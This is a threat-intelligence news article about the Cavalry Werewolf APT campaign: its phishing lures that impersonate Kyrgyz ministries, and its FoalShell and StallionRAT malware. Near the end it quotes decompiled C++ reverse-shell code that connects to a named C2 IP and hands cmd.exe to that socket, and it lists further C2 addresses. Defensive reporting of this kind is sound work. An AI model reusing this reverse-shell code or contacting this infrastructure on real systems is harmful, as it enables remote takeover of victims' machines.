A sophisticated threat campaign has emerged targeting Russia’s public sector and critical industries between May and August 2025.
The Cavalry Werewolf APT group, also known as YoroTrooper and Silent Lynx, has been actively deploying custom-built malware toolsets through highly targeted phishing operations that exploit trusted governmental relationships.
The campaign focuses on organizations within energy, mining, and manufacturing sectors, leveraging two primary malware families designed for persistent access and command execution.
The threat actors employ spear-phishing emails disguised as official correspondence from legitimate Kyrgyz government entities, including the Ministry of Economy and Commerce and the Ministry of Transport and Communications.
These messages carry RAR archives containing either FoalShell reverse shell or StallionRAT remote access trojan, with filenames carefully crafted to mimic genuine official documents such as “three-month results of joint operations” or “shortlist of employees to receive bonuses.”
The attackers blur the line between impersonation and actual compromise, with evidence suggesting they may have successfully breached real official email accounts to enhance their operational credibility.
Picussecurity analysts identified that the malicious archives are typically downloaded to the %LocalAppData%MicrosoftWindowsINetCacheContent.Outlook directory, presenting a key detection opportunity for security teams monitoring Outlook cache activity.
The sophistication of this campaign extends beyond social engineering tactics, incorporating multi-language malware implementations that demonstrate the group’s technical versatility and commitment to operational security.
The threat actors have developed variants of their malware in C#, C++, Go, PowerShell, and Python, each designed to evade detection through different mechanisms while maintaining core command-and-control functionality.
Desktop artifacts discovered during analysis indicate the group is preparing to expand beyond Russian targets, with files in Tajik language suggesting interest in Tajikistan and Arabic-named documents pointing toward potential Middle Eastern reconnaissance.
The discovery of AsyncRAT installer files further highlights the group’s evolving toolkit and ambitious operational scope.
FoalShell: Multi-Language Backdoor Architecture
FoalShell represents a lightweight but effective reverse shell implementation designed to grant attackers command-line access through cmd.exe on compromised systems.
The malware’s architecture varies across programming languages, with the C# version establishing straightforward TCP connections to command-and-control servers while maintaining stealth through hidden window styles.
The core functionality operates through a continuous loop that receives commands, executes them via cmd.exe, and returns both standard and error output to the C2 infrastructure located at IP address 188.127.225.191 on port 443.
The C++ variant employs more sophisticated evasion techniques through shellcode loading mechanisms.
An obfuscated FoalShell shellcode is embedded within the executable’s resources under the name “output_bin,” which is extracted and executed in memory allocated with Read, Write, Execute permissions using VirtualAlloc.
The shellcode then deobfuscates the main reverse shellcode before establishing network connectivity to C2 server 109.172.85.63.
*(_DWORD *)&name.sa_data[2] = inet_addr("109.172.85.63");
WSAConnect(s, &name, 16, 0LL, 0LL, 0LL, 0LL);
StartupInfo.dwFlags = 257;
StartupInfo.hStdError = (HANDLE)s;
StartupInfo.hStdOutput = (HANDLE)s;
StartupInfo.hStdInput = (HANDLE)s;
CreateProcessA(0LL, (LPSTR)"cmd.exe", 0LL, 0LL, 1, 0, 0LL, &StartupInfo, &ProcessInformation);The Go implementation utilizes its own networking stack to connect to C2 server 62.113.114.209 on port 443, forcing cmd.exe processes to run in hidden window states through the HideWindow parameter set to 1.
This multi-language approach allows the attackers to adapt their deployment strategy based on target environment characteristics and security posture, making detection more challenging for traditional signature-based security solutions.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
